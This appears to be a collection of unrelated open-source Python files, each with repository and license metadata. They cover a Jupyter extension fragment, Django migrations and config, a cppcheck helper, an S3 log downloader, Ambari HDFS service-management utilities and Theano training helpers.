return {}
def load_jupyter_server_extension(nb_app):
web_app = nb_app.web_app
base_url = web_app.settings['base_url']
route_pattern = url_path_join(base_url, '/saagie')
web_app.add_handlers('.*$', [(route_pattern, SaagieHandler)])
route_pattern = url_path_join(base_url, '/saagie/check')
web_app.add_handlers('.*$', [(route_pattern, SaagieCheckHandler)])
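# A notebook server extension like this is typically enabled with something
# along the lines of `jupyter serverextension enable --py saagie`
# (hypothetical; the exact module name depends on how the plugin is packaged).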
|
saagie/jupyter-saagie-plugin
|
saagie/server_extension.py
|
Python
|
apache-2.0
| 16,090
| 0.00174
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-12-23 10:13
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('blog', '0006_auto_20160321_1527'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.AddField(
model_name='post',
name='blog',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='blog.Blog'),
),
]
|
pinax/pinax-blog
|
pinax/blog/migrations/0007_auto_20161223_1013.py
|
Python
|
mit
| 752
| 0.00266
|
# Generated by Django 2.2.24 on 2021-10-21 02:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("cases", "0015_case_is_quarantied"),
]
operations = [
migrations.AddIndex(
model_name="case",
index=models.Index(
fields=["created"], name="cases_case_created_a615f3_idx"
),
),
]
|
watchdogpolska/feder
|
feder/cases/migrations/0016_auto_20211021_0245.py
|
Python
|
mit
| 423
| 0
|
"""
WSGI config for ffstats project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "ffstats.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ffstats.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
daynesh/ffstats
|
ffstats/wsgi.py
|
Python
|
apache-2.0
| 1,422
| 0.000703
|
#!/usr/bin/env python
from __future__ import print_function
import argparse
import xml.etree.ElementTree as ET
def main():
parser = argparse.ArgumentParser(description="List all error without a CWE assigned in CSV format")
parser.add_argument("-F", metavar="filename", required=True,
help="XML file containing output from: ./cppcheck --errorlist --xml-version=2")
parsed = parser.parse_args()
tree = ET.parse(vars(parsed)["F"])
root = tree.getroot()
for child in root.iter("error"):
if "cwe" not in child.attrib:
print(child.attrib["id"], child.attrib["severity"], child.attrib["verbose"], sep=", ")
if __name__ == "__main__":
main()
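# Typical use, per the --help text above:
#   cppcheck --errorlist --xml-version=2 > errors.xml
#   python listErrorsWithoutCWE.py -F errors.xml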
|
danmar/cppcheck
|
tools/listErrorsWithoutCWE.py
|
Python
|
gpl-3.0
| 710
| 0.005634
|
import django_filters
from .models import Resource
class ResourceFilter(django_filters.FilterSet):
class Meta:
model = Resource
fields = [
'title',
'description',
'domains',
'topics',
'resource_type',
'suitable_for',
]
|
evildmp/django-curated-resources
|
curated_resources/filters.py
|
Python
|
bsd-2-clause
| 336
| 0.02381
|
#!/usr/bin/env python
# encoding: utf-8
"""
Download command for ssstat--download logs without adding to MongoDB.
2012-11-18 - Created by Jonathan Sick
"""
import os
import logging
from cliff.command import Command
import ingest_core
class DownloadCommand(Command):
"""ssstat download"""
log = logging.getLogger(__name__)
def get_parser(self, progName):
"""Adds command line options."""
parser = super(DownloadCommand, self).get_parser(progName)
parser.add_argument('log_bucket',
help='Name of S3 Logging Bucket')
parser.add_argument('prefix',
help='Prefix for the desired log files')
parser.add_argument('--cache-dir',
default=os.path.expandvars("$HOME/.ssstat/cache"),
action='store',
dest='cache_dir',
help='Local directory where logs are cached')
        # argparse's type=bool treats any non-empty string (even "False") as
        # True, so parse the value explicitly instead.
        parser.add_argument('--delete',
            dest='delete',
            default=True,
            type=lambda v: str(v).lower() in ('1', 'true', 'yes'),
            help='Delete downloaded logs from S3 (true/false)')
return parser
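    # Hypothetical invocation:
    #   ssstat download my-log-bucket logs/2012- --cache-dir ~/.ssstat/cache --delete false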
def take_action(self, parsedArgs):
"""Runs the `ssstat download` command pipeline."""
self.log.debug("Running ssstat download")
# Downloads logs into root of cache directory
ingest_core.download_logs(parsedArgs.log_bucket,
parsedArgs.prefix, parsedArgs.cache_dir,
delete=parsedArgs.delete)
def main():
pass
if __name__ == '__main__':
main()
|
jonathansick/Ssstat
|
ssstat/download.py
|
Python
|
bsd-2-clause
| 1,488
| 0.008065
|
# Copyright (c) 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from perf_insights import local_directory_corpus_driver
class LocalDirectoryCorpusDriverTests(unittest.TestCase):
def testTags(self):
self.assertEquals(
local_directory_corpus_driver._GetTagsForRelPath('a.json'), [])
self.assertEquals(
local_directory_corpus_driver._GetTagsForRelPath('/b/c/a.json'),
['b', 'c'])
|
zeptonaut/catapult
|
perf_insights/perf_insights/local_directory_corpus_driver_unittest.py
|
Python
|
bsd-3-clause
| 531
| 0.003766
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import re
import urllib2
import ambari_simplejson as json # simplejson is much faster comparing to Python 2.6 json module and has the same functions set.
from resource_management.core.resources.system import Directory, File, Execute
from resource_management.libraries.functions.format import format
from resource_management.libraries.functions import check_process_status
from resource_management.libraries.functions import StackFeature
from resource_management.libraries.functions.stack_features import check_stack_feature
from resource_management.core import shell
from resource_management.core.shell import as_user, as_sudo
from resource_management.core.source import Template
from resource_management.core.exceptions import ComponentIsNotRunning
from resource_management.core.logger import Logger
from resource_management.libraries.functions.curl_krb_request import curl_krb_request
from resource_management.libraries.script.script import Script
from resource_management.libraries.functions.namenode_ha_utils import get_namenode_states
from resource_management.libraries.functions.show_logs import show_logs
from ambari_commons.inet_utils import ensure_ssl_using_protocol
from zkfc_slave import ZkfcSlaveDefault
ensure_ssl_using_protocol(
Script.get_force_https_protocol_name(),
Script.get_ca_cert_file_path()
)
def safe_zkfc_op(action, env):
"""
Idempotent operation on the zkfc process to either start or stop it.
:param action: start or stop
:param env: environment
"""
Logger.info("Performing action {0} on zkfc.".format(action))
zkfc = None
if action == "start":
try:
ZkfcSlaveDefault.status_static(env)
except ComponentIsNotRunning:
ZkfcSlaveDefault.start_static(env)
if action == "stop":
try:
ZkfcSlaveDefault.status_static(env)
except ComponentIsNotRunning:
pass
else:
ZkfcSlaveDefault.stop_static(env)
def initiate_safe_zkfc_failover():
"""
If this is the active namenode, initiate a safe failover and wait for it to become the standby.
  If an error occurs, force a failover by killing zkfc on this host; in that case, ZKFC will
  also have to be started manually during the Restart.
"""
import params
# Must kinit before running the HDFS command
if params.security_enabled:
Execute(format("{kinit_path_local} -kt {hdfs_user_keytab} {hdfs_principal_name}"),
user = params.hdfs_user)
active_namenode_id = None
standby_namenode_id = None
active_namenodes, standby_namenodes, unknown_namenodes = get_namenode_states(params.hdfs_site, params.security_enabled, params.hdfs_user)
if active_namenodes:
active_namenode_id = active_namenodes[0][0]
if standby_namenodes:
standby_namenode_id = standby_namenodes[0][0]
if active_namenode_id:
Logger.info(format("Active NameNode id: {active_namenode_id}"))
if standby_namenode_id:
Logger.info(format("Standby NameNode id: {standby_namenode_id}"))
if unknown_namenodes:
for unknown_namenode in unknown_namenodes:
Logger.info("NameNode HA state for {0} is unknown".format(unknown_namenode[0]))
if params.namenode_id == active_namenode_id and params.other_namenode_id == standby_namenode_id:
# Failover if this NameNode is active and other NameNode is up and in standby (i.e. ready to become active on failover)
Logger.info(format("NameNode {namenode_id} is active and NameNode {other_namenode_id} is in standby"))
failover_command = format("hdfs haadmin -ns {dfs_ha_nameservices} -failover {namenode_id} {other_namenode_id}")
check_standby_cmd = format("hdfs haadmin -ns {dfs_ha_nameservices} -getServiceState {namenode_id} | grep standby")
msg = "Rolling Upgrade - Initiating a ZKFC failover on active NameNode host {0}.".format(params.hostname)
Logger.info(msg)
code, out = shell.call(failover_command, user=params.hdfs_user, logoutput=True)
Logger.info(format("Rolling Upgrade - failover command returned {code}"))
wait_for_standby = False
if code == 0:
wait_for_standby = True
else:
# Try to kill ZKFC manually
was_zkfc_killed = kill_zkfc(params.hdfs_user)
code, out = shell.call(check_standby_cmd, user=params.hdfs_user, logoutput=True)
Logger.info(format("Rolling Upgrade - check for standby returned {code}"))
if code == 255 and out:
Logger.info("Rolling Upgrade - NameNode is already down.")
else:
if was_zkfc_killed:
# Only mandate that this be the standby namenode if ZKFC was indeed killed to initiate a failover.
wait_for_standby = True
if wait_for_standby:
Logger.info("Waiting for this NameNode to become the standby one.")
Execute(check_standby_cmd,
user=params.hdfs_user,
tries=50,
try_sleep=6,
logoutput=True)
else:
msg = "Rolling Upgrade - Skipping ZKFC failover on NameNode host {0}.".format(params.hostname)
Logger.info(msg)
def kill_zkfc(zkfc_user):
"""
There are two potential methods for failing over the namenode, especially during a Rolling Upgrade.
Option 1. Kill zkfc on primary namenode provided that the secondary is up and has zkfc running on it.
Option 2. Silent failover
:param zkfc_user: User that started the ZKFC process.
:return: Return True if ZKFC was killed, otherwise, false.
"""
import params
if params.dfs_ha_enabled:
if params.zkfc_pid_file:
check_process = as_user(format("ls {zkfc_pid_file} > /dev/null 2>&1 && ps -p `cat {zkfc_pid_file}` > /dev/null 2>&1"), user=zkfc_user)
code, out = shell.call(check_process)
if code == 0:
Logger.debug("ZKFC is running and will be killed.")
kill_command = format("kill -15 `cat {zkfc_pid_file}`")
Execute(kill_command,
user=zkfc_user
)
File(params.zkfc_pid_file,
action = "delete",
)
return True
return False
def service(action=None, name=None, user=None, options="", create_pid_dir=False,
create_log_dir=False):
"""
:param action: Either "start" or "stop"
:param name: Component name, e.g., "namenode", "datanode", "secondarynamenode", "zkfc"
:param user: User to run the command as
:param options: Additional options to pass to command as a string
:param create_pid_dir: Create PID directory
  :param create_log_dir: Create log file directory
"""
import params
options = options if options else ""
pid_dir = format("{hadoop_pid_dir_prefix}/{user}")
pid_file = format("{pid_dir}/hadoop-{user}-{name}.pid")
hadoop_env_exports = {
'HADOOP_LIBEXEC_DIR': params.hadoop_libexec_dir
}
log_dir = format("{hdfs_log_dir_prefix}/{user}")
# NFS GATEWAY is always started by root using jsvc due to rpcbind bugs
# on Linux such as CentOS6.2. https://bugzilla.redhat.com/show_bug.cgi?id=731542
if name == "nfs3" :
import status_params
pid_file = status_params.nfsgateway_pid_file
custom_export = {
'HADOOP_PRIVILEGED_NFS_USER': params.hdfs_user,
'HADOOP_PRIVILEGED_NFS_PID_DIR': pid_dir,
'HADOOP_PRIVILEGED_NFS_LOG_DIR': log_dir
}
hadoop_env_exports.update(custom_export)
process_id_exists_command = as_sudo(["test", "-f", pid_file]) + " && " + as_sudo(["pgrep", "-F", pid_file])
# on STOP directories shouldn't be created
# since during stop still old dirs are used (which were created during previous start)
if action != "stop":
if name == "nfs3":
Directory(params.hadoop_pid_dir_prefix,
mode=0755,
owner=params.root_user,
group=params.root_group
)
else:
Directory(params.hadoop_pid_dir_prefix,
mode=0755,
owner=params.hdfs_user,
group=params.user_group
)
if create_pid_dir:
Directory(pid_dir,
owner=user,
group=params.user_group,
create_parents = True)
if create_log_dir:
if name == "nfs3":
Directory(log_dir,
mode=0775,
owner=params.root_user,
group=params.user_group)
else:
Directory(log_dir,
owner=user,
group=params.user_group,
create_parents = True)
if params.security_enabled and name == "datanode":
## The directory where pid files are stored in the secure data environment.
hadoop_secure_dn_pid_dir = format("{hadoop_pid_dir_prefix}/{hdfs_user}")
hadoop_secure_dn_pid_file = format("{hadoop_secure_dn_pid_dir}/hadoop_secure_dn.pid")
# At datanode_non_root stack version and further, we may start datanode as a non-root even in secure cluster
if not (params.stack_version_formatted and check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) or params.secure_dn_ports_are_in_use:
user = "root"
pid_file = format(
"{hadoop_pid_dir_prefix}/{hdfs_user}/hadoop-{hdfs_user}-{name}.pid")
if action == 'stop' and (params.stack_version_formatted and check_stack_feature(StackFeature.DATANODE_NON_ROOT, params.stack_version_formatted)) and \
os.path.isfile(hadoop_secure_dn_pid_file):
# We need special handling for this case to handle the situation
# when we configure non-root secure DN and then restart it
# to handle new configs. Otherwise we will not be able to stop
# a running instance
user = "root"
try:
check_process_status(hadoop_secure_dn_pid_file)
custom_export = {
'HADOOP_SECURE_DN_USER': params.hdfs_user
}
hadoop_env_exports.update(custom_export)
except ComponentIsNotRunning:
pass
hadoop_daemon = format("{hadoop_bin}/hadoop-daemon.sh")
if user == "root":
cmd = [hadoop_daemon, "--config", params.hadoop_conf_dir, action, name]
if options:
cmd += [options, ]
daemon_cmd = as_sudo(cmd)
else:
cmd = format("{ulimit_cmd} {hadoop_daemon} --config {hadoop_conf_dir} {action} {name}")
if options:
cmd += " " + options
daemon_cmd = as_user(cmd, user)
if action == "start":
# remove pid file from dead process
File(pid_file, action="delete", not_if=process_id_exists_command)
try:
Execute(daemon_cmd, not_if=process_id_exists_command, environment=hadoop_env_exports)
except:
show_logs(log_dir, user)
raise
elif action == "stop":
try:
Execute(daemon_cmd, only_if=process_id_exists_command, environment=hadoop_env_exports)
except:
show_logs(log_dir, user)
raise
File(pid_file, action="delete")
def get_jmx_data(nn_address, modeler_type, metric, encrypted=False, security_enabled=False):
"""
:param nn_address: Namenode Address, e.g., host:port, ** MAY ** be preceded with "http://" or "https://" already.
If not preceded, will use the encrypted param to determine.
:param modeler_type: Modeler type to query using startswith function
  :param metric: Metric to return
  :param encrypted: When nn_address lacks a scheme, prepend "https://" if True, "http://" otherwise
  :param security_enabled: When True, issue the JMX request with Kerberos authentication
  :return: Return an object representation of the metric, or None if it does not exist
"""
if not nn_address or not modeler_type or not metric:
return None
nn_address = nn_address.strip()
if not nn_address.startswith("http"):
nn_address = ("https://" if encrypted else "http://") + nn_address
if not nn_address.endswith("/"):
nn_address = nn_address + "/"
nn_address = nn_address + "jmx"
Logger.info("Retrieve modeler: %s, metric: %s from JMX endpoint %s" % (modeler_type, metric, nn_address))
if security_enabled:
import params
data, error_msg, time_millis = curl_krb_request(params.tmp_dir, params.smoke_user_keytab, params.smokeuser_principal, nn_address,
"jn_upgrade", params.kinit_path_local, False, None, params.smoke_user)
else:
data = urllib2.urlopen(nn_address).read()
my_data = None
if data:
data_dict = json.loads(data)
if data_dict:
for el in data_dict['beans']:
if el is not None and el['modelerType'] is not None and el['modelerType'].startswith(modeler_type):
if metric in el:
my_data = el[metric]
if my_data:
my_data = json.loads(str(my_data))
break
return my_data
def get_port(address):
"""
Extracts port from the address like 0.0.0.0:1019
"""
if address is None:
return None
m = re.search(r'(?:http(?:s)?://)?([\w\d.]*):(\d{1,5})', address)
if m is not None and len(m.groups()) >= 2:
return int(m.group(2))
else:
return None
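# Illustrative: get_port('0.0.0.0:1019') returns 1019 and
# get_port('https://namenode.example.com:50470') returns 50470; an address
# without an explicit port returns None.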
def is_secure_port(port):
"""
Returns True if port is root-owned at *nix systems
"""
if port is not None:
return port < 1024
else:
return False
def is_previous_fs_image():
"""
Return true if there's a previous folder in the HDFS namenode directories.
"""
import params
if params.dfs_name_dir:
nn_name_dirs = params.dfs_name_dir.split(',')
for nn_dir in nn_name_dirs:
prev_dir = os.path.join(nn_dir, "previous")
if os.path.isdir(prev_dir):
return True
return False
def get_hdfs_binary(distro_component_name):
"""
Get the hdfs binary to use depending on the stack and version.
:param distro_component_name: e.g., hadoop-hdfs-namenode, hadoop-hdfs-datanode
:return: The hdfs binary to use
"""
import params
hdfs_binary = "hdfs"
if params.stack_version_formatted and check_stack_feature(StackFeature.ROLLING_UPGRADE, params.stack_version_formatted):
hdfs_binary = "{0}/current/{1}/bin/hdfs".format(params.stack_root, distro_component_name)
return hdfs_binary
def get_dfsadmin_base_command(hdfs_binary, use_specific_namenode = False):
"""
Get the dfsadmin base command constructed using hdfs_binary path and passing namenode address as explicit -fs argument
:param hdfs_binary: path to hdfs binary to use
:param use_specific_namenode: flag if set and Namenode HA is enabled, then the dfsadmin command will use
current namenode's address
:return: the constructed dfsadmin base command
"""
import params
dfsadmin_base_command = ""
if params.dfs_ha_enabled and use_specific_namenode:
dfsadmin_base_command = format("{hdfs_binary} dfsadmin -fs hdfs://{params.namenode_rpc}")
else:
dfsadmin_base_command = format("{hdfs_binary} dfsadmin -fs {params.namenode_address}")
return dfsadmin_base_command
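# Illustrative result: with HA enabled and use_specific_namenode=True this
# returns something like "hdfs dfsadmin -fs hdfs://nn1.example.com:8020"
# (hostname hypothetical); otherwise the configured namenode_address is used.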
def set_up_zkfc_security(params):
""" Sets up security for accessing zookeper on secure clusters """
if params.stack_supports_zk_security is False:
Logger.info("Skipping setting up secure ZNode ACL for HFDS as it's supported only for HDP 2.6 and above.")
return
# check if the namenode is HA
if params.dfs_ha_enabled is False:
Logger.info("Skipping setting up secure ZNode ACL for HFDS as it's supported only for NameNode HA mode.")
return
# check if the cluster is secure (skip otherwise)
if params.security_enabled is False:
Logger.info("Skipping setting up secure ZNode ACL for HFDS as it's supported only for secure clusters.")
return
# process the JAAS template
File(os.path.join(params.hadoop_conf_secure_dir, 'hdfs_jaas.conf'),
owner=params.hdfs_user,
group=params.user_group,
mode=0644,
content=Template("hdfs_jaas.conf.j2")
)
|
alexryndin/ambari
|
ambari-server/src/main/resources/stacks/ADH/1.0/services/HDFS/package/scripts/utils.py
|
Python
|
apache-2.0
| 16,170
| 0.013296
|
import os
import logging
import numpy as np
import theano
from pandas import DataFrame, read_hdf
from blocks.extensions import Printing, SimpleExtension
from blocks.main_loop import MainLoop
from blocks.roles import add_role
logger = logging.getLogger('main.utils')
def shared_param(init, name, cast_float32, role, **kwargs):
    # Without the else branch, v would be undefined when cast_float32 is False.
    v = np.float32(init) if cast_float32 else init
    p = theano.shared(v, name=name, **kwargs)
    add_role(p, role)
    return p
class AttributeDict(dict):
__getattr__ = dict.__getitem__
def __setattr__(self, a, b):
self.__setitem__(a, b)
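# e.g. d = AttributeDict(foo=1); d.bar = 2  =>  d.foo == 1 and d['bar'] == 2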
class DummyLoop(MainLoop):
def __init__(self, extensions):
return super(DummyLoop, self).__init__(algorithm=None,
data_stream=None,
extensions=extensions)
def run(self):
for extension in self.extensions:
extension.main_loop = self
self._run_extensions('before_training')
self._run_extensions('after_training')
class ShortPrinting(Printing):
def __init__(self, to_print, use_log=True, **kwargs):
self.to_print = to_print
self.use_log = use_log
super(ShortPrinting, self).__init__(**kwargs)
def do(self, which_callback, *args):
log = self.main_loop.log
# Iteration
msg = "e {}, i {}:".format(
log.status['epochs_done'],
log.status['iterations_done'])
# Requested channels
items = []
for k, vars in self.to_print.iteritems():
for shortname, vars in vars.iteritems():
if vars is None:
continue
if type(vars) is not list:
vars = [vars]
s = ""
for var in vars:
try:
name = k + '_' + var.name
val = log.current_row[name]
except:
continue
try:
s += ' ' + ' '.join(["%.3g" % v for v in val])
except:
s += " %.3g" % val
if s != "":
items += [shortname + s]
msg = msg + ", ".join(items)
if self.use_log:
logger.info(msg)
else:
print msg
class SaveParams(SimpleExtension):
"""Finishes the training process when triggered."""
def __init__(self, trigger_var, params, save_path, **kwargs):
super(SaveParams, self).__init__(**kwargs)
if trigger_var is None:
self.var_name = None
else:
self.var_name = trigger_var[0] + '_' + trigger_var[1].name
self.save_path = save_path
self.params = params
self.to_save = {}
self.best_value = None
self.add_condition(['after_training'], self.save)
self.add_condition(['on_interrupt'], self.save)
def save(self, which_callback, *args):
if self.var_name is None:
self.to_save = {v.name: v.get_value() for v in self.params}
path = self.save_path + '/trained_params'
logger.info('Saving to %s' % path)
np.savez_compressed(path, **self.to_save)
def do(self, which_callback, *args):
if self.var_name is None:
return
val = self.main_loop.log.current_row[self.var_name]
if self.best_value is None or val < self.best_value:
self.best_value = val
self.to_save = {v.name: v.get_value() for v in self.params}
class SaveExpParams(SimpleExtension):
def __init__(self, experiment_params, dir, **kwargs):
super(SaveExpParams, self).__init__(**kwargs)
self.dir = dir
self.experiment_params = experiment_params
def do(self, which_callback, *args):
df = DataFrame.from_dict(self.experiment_params, orient='index')
df.to_hdf(os.path.join(self.dir, 'params'), 'params', mode='w',
complevel=5, complib='blosc')
class SaveLog(SimpleExtension):
def __init__(self, dir, show=None, **kwargs):
super(SaveLog, self).__init__(**kwargs)
self.dir = dir
self.show = show if show is not None else []
def do(self, which_callback, *args):
df = DataFrame.from_dict(self.main_loop.log, orient='index')
df.to_hdf(os.path.join(self.dir, 'log'), 'log', mode='w',
complevel=5, complib='blosc')
def prepare_dir(save_to, results_dir='results'):
base = os.path.join(results_dir, save_to)
i = 0
while True:
name = base + str(i)
try:
os.makedirs(name)
break
except:
i += 1
return name
def load_df(dirpath, filename, varname=None):
varname = filename if varname is None else varname
fn = os.path.join(dirpath, filename)
return read_hdf(fn, varname)
def filter_funcs_prefix(d, pfx):
    # Keep entries whose name contains pfx, stripping everything up to and
    # including it (e.g. 'cmd_train' -> 'train' for pfx='cmd_').
    fp = lambda x: x.find(pfx)
    return {n[fp(n) + len(pfx):]: v for n, v in d.iteritems() if fp(n) >= 0}
|
arasmus/ladder
|
utils.py
|
Python
|
mit
| 5,079
| 0.000788
|